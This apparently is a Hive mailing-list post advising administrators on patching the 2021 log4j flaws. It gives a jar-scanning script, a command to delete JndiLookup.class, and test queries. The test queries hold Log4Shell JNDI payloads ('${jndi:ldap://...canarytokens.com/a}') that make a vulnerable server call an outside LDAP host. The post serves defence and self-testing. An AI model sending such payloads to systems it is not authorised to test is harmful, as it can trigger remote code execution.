Recent log4j vulnerabilities

[Zoltan Haindrich <ki...@rxd.hu>]

Hello all!

In the recent week there were 2 new log4j vulnerabilities discovered (CVE-2021-45046, CVE-2021-44228) - and since we use log4j in Hive; existing installations might be 
affected as well.

Doing a new Hive release on any existing line would probably need a longer timeframe - and doing an upgrade would probably cause further problems for existing installation; 
for now I'll try to give some help to help in patching existing clusters.

My understanding is that both CVE can be fixed by following one of these options:
* remove the JndiLookup.class from the affected jars
* replace the jar with the 2.16.0 version

To identify the affected jars; you could run this script - which will ignore 2.16.0 if there is any:

pat=org/apache/logging/log4j/core/lookup/JndiLookup.class mc=org/apache/logging/log4j/core/pattern/MessagePatternConverter.class && find . -name '*.jar'|xargs -n1 -IJAR 
unzip -t JAR |fgrep -f <(echo "$pat";echo 'Archive:')|grep -B1 "$pat"|grep '^Archive:'|cut -d '/' -f2-|xargs -n1 -IJAR bash -c 'unzip -p JAR $mc|md5sum|paste - <(echo 
JAR)'|fgrep -vf <(echo 374fa1c796465d8f542bb85243240555 )

You could remove the JndiLookup.class from the identified jars with something similar to this:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

To validate if you are still affected or not:
* generate a token on https://canarytokens.org/
* try with queries like (replace your token):
set hive.fetch.task.conversion=none;
create table aa (a string) location 'file:///dfs${jndi:ldap:....canarytokens.com/a}';
select '${jndi:ldap://....canarytokens.com/a}';

cheers,
Zoltan